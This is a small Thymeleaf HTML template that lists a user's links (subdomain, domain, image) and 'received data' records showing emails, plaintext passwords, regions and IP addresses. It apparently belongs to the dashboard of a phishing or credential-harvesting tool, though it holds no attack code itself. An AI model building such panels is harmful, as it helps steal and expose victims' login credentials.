<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org">
<head>
    <title>User Detail</title>
</head>
<body>
    <h1>User Detail</h1>
    <div th:each="link : ${user.links}">
        <p>Link Id: <span th:text="${link.id}"></span></p>
        <p>Subdomain: <span th:text="${link.subdomain}"></span></p>
        <p>Domain: <span th:text="${link.domain}"></span></p>
        <p>Image: <span th:text="${link.image}"></span></p>
    </div>
    <div th:each="receivedData : ${user.receivedData}">
        <p>Received Data Id: <span th:text="${receivedData.id}"></span></p>
        <p>Email: <span th:text="${receivedData.email}"></span></p>
        <p>Password: <span th:text="${receivedData.password}"></span></p>
        <p>Region: <span th:text="${receivedData.region}"></span></p>
        <p>IP Address: <span th:text="${receivedData.ipAddress}"></span></p>
    </div>
</body>
</html>
